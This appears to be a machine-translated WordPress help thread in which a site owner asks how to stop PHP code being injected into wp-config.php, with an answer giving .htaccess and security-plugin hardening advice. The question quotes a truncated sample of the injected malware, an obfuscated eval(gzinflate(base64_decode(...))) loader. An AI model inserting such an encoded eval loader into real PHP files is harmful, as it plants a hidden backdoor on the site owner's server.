删除被黑客攻击的代码--出主意!

时间:2014-01-06 作者:Dan

我一直在从事一个项目,该项目不断在配置中插入一些PHP。php文件,它导致了很多SEO问题。在这篇介绍之后,我将粘贴一个示例(它很长)。我已经删除了好几次,更改了FTP密码、管理员密码和用户名、盐并检查了。htaccess-除此之外,我还被卡住了。有没有办法解决这个问题?

部分代码,中间删减了很多;

eval(gzinflate(base64_decode(\'pRn9c9o49ufczP0PKuPGuHHAGAihiZN2U7q7M9dtj6Y3c5OkjLBl8GJsr2wINM7/fu9J8kcI2dub67RI1vvU+5KeGvik+cwloQZZf1zzedt1ZZlcpyBPJMvX2pG1Dprepar9axCdwIH0gE+bythF4QS5moVpGq9H/ZZomjWCjjmNihq1vs40FxskklHEdv6/jmX36VOulSG/Bj9Z9GL3mKPHODawgnPPcBAheCc+qFKjBe8n3aMImMpEvSteAiXZR/ovb0UMgrDAs8IXtyOPNwPy2Yyf9vqj027LHnfzEoKLIbhMjdKE6juoGrE7goKguDPBX4+B8=\')));

1 个回复
最合适的回答,由SO网友:Brad Dalton 整理而成

您可以将wp配置文件上移一级。

您还可以创建。htaccess文件,并使用以下代码将其上载到uploads文件夹:

<Files ~ ".*..*">
Order Allow,Deny
Deny from all
</Files>
<FilesMatch ".(jpg|jpeg|jpe|gif|png)$">
Order Deny,Allow
Allow from all
</FilesMatch>
或者安装一个安全插件,该插件还可以扫描您的安装,以便您可以更轻松地find the malicious code. http://wordpress.org/plugins/wordfence/

更安全。http://codex.wordpress.org/Hardening_WordPress

结束
标签: security   wp-config   hacked   小码农  

相关推荐

Wp-config.php文件权限

我已经在本地Ubuntu机器上安装了Wordpress,带有标准的LAMP配置和phpMyAdmin。安装目录为localhost:///var/www/blog.在安装的第二步,在我进入MySQL配置后,出现以下消息:Sorry, but I can’t write the wp-config.php file. 当前权限为:-rw-r--r-- 1 adam adam 2.0K Oct 23 2010 wp-links-opml.php -rw-r--r-- 1 adam adam